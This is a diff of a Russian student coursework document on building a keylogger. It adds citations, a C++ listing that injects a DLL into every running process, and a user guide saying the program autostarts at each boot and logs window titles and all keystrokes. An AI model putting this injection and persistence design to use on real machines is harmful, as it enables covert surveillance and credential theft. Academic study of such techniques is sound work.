-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8C3A08D-E4A9-4CE8-A49E-89A29BC5122B}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C5295EBD-EFCA-42F8-AB8A-58E6ADD88CEC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -1444,6 +1444,13 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[3]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1589,7 +1596,21 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
+        <w:t>Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1711,6 +1732,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve">  К достоинствам этого метода перехвата относится простота и гарантированный перехват всех нажатий клавиатуры, из недостатков можно отметить необходимость наличия отдельного файла динамической библиотеки и относительную простоту обнаружения по причине внедрения во все системные процессы.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[5]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1796,6 +1824,13 @@
         </w:rPr>
         <w:t>недостатки — отсутствие гарантии обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[5]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1917,6 +1952,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1939,6 +1975,14 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>. Недостатки — необходимость установки собственного драйвера.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>[3]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8605,546 +8649,1334 @@
         </w:rPr>
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">части системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>TH32CS_SNAPPROCESS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ProcessID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwFlags</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> TH32CS_SNAPPROCESS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>этот</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>параметр</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>игнорируется</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>й дескриптор к указанному снимку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>5.5.1 Листинг кода инжекции в процессы, полученные в снимке</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (hProcessSnap == INVALID_HANDLE_VALUE)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return FALSE;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>pe32.dwSize = sizeof(PROCESSENTRY32);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>do {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (!Process3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2Next(hProcessSnap, &amp;pe32))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return FALSE;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (Inject(pe32.th32ProcessID, dllPath))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>} whil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Руководство пользователя</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для установки приложения требуется запустить исполняемый файл программы. В результате программа установится на компьютер и при каждой загрузке компьютера будет запускаться автоматически.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Рассмотри работу с лог-файлами программы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D66363" wp14:editId="5020ACD6">
+            <wp:extent cx="5664200" cy="3340100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId8"/>
+                    <a:srcRect l="4650"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5664200" cy="3340100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Рисунок 6.1 лог-файл</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>При изменении активного окна или заголовка активного окна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в лог-файл записывается заголовок окна и идентификатор процесса.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> В случае нажатии клавиши на клавиатуре, в лог файл записывается</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> время нажатия и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>соответствующий символ.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> При нажатии </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на системные</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиш</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в лог файл записывается соответствующее название клавиши в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> квадратных скобках.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Это позволяет собрать полную информацию о работе пользователя.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Тестирование программы</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для тестирования </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>был использован аналог разрабатываемого приложения -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> программа </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
